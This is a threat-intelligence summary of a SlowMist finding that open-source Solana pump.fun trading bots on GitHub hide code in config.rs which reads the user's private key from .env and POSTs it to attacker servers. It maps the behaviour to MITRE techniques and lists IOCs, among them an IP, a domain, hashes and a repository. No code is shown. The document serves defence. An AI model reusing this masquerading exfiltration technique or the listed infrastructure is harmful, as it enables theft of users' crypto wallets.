The SlowMist security team uncovered a crypto-stealing mechanism hidden within open-source Solana trading bots on GitHub that exfiltrate private keys to attacker-controlled servers. The attack exploits user trust in open-source projects by embedding malicious code that sends sensitive data silently upon execution. #Solana #pumpfun #SlowMist
Keypoints
- A malicious coin-stealing mechanism was found in the open-source GitHub projects zldp2002/solana-pumpfun-bot and audiofilter/pumpfun-pumpswap-sniper-copy-trading-bot.
- The attack code is located in the configuration file src/common/config.rs, specifically in the create_coingecko_proxy() method.
- The malware retrieves the private key from the local .env file and exfiltrates it via a POST request to attacker-controlled endpoints.
- The attacker’s server IP address 103.35.189.28 (US-hosted) and domain storebackend-qpq3.onrender.com were identified as command and control nodes.
- Dynamic analysis confirmed that the malicious bot sends the private key to servers without alerting the victim, masking the activity by integrating legitimate functions.
- The GitHub repositories involved had recent updates replacing encoded attacker server addresses, indicating active maintenance of the malware.
- Users are urged to avoid running unknown open-source wallet tools and to use sandbox environments to prevent sensitive data exposure.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – Malicious Rust code executes the create_coingecko_proxy() function to initiate private key theft and HTTP POST exfiltration (‘create_coingecko_proxy() method sends a JSON payload embedding the private key to the attacker’s server’).
- [T1552] Unsecured Credentials – The malware reads the PRIVATE_KEY from the local .env file using import_env_var(), exploiting insecure storage of sensitive data (‘Sensitive data such as the PRIVATE_KEY is stored in the .env file’).
- [T1071] Application Layer Protocol – The attacker uses HTTP POST requests to exfiltrate stolen private keys to their server (‘sends it via a POST request to the attacker’s server’).
- [T1036] Masquerading – Malicious functionality is disguised as a legitimate price retrieval feature, and misleading method names hide the true intent (‘create_coingecko_proxy() method includes legitimate-looking functionality such as price retrieval, which helps mask its malicious intent’).
Indicators of Compromise
- [IP Addresses] Attacker’s command and control server – 103.35.189.28
- [Domains] Malicious backend server domain – storebackend-qpq3.onrender.com
- [File Hashes] Malicious project files – 07f0364171627729788797bb37e0170a06a787a479666abf8c80736722bb79e8 (pumpfun-pumpswap-sniper-copy-trading-bot-master.zip), ace4b1fc4290d6ffd7da0fa943625b3a852190f0aa8d44b93623423299809e48 (pumpfun-pumpswap-sniper-copy-trading-bot-master/src/common/config.rs)
- [Repositories] Malicious GitHub repository – https://github.com/audiofilter/pumpfun-pumpswap-sniper-copy-trading-bot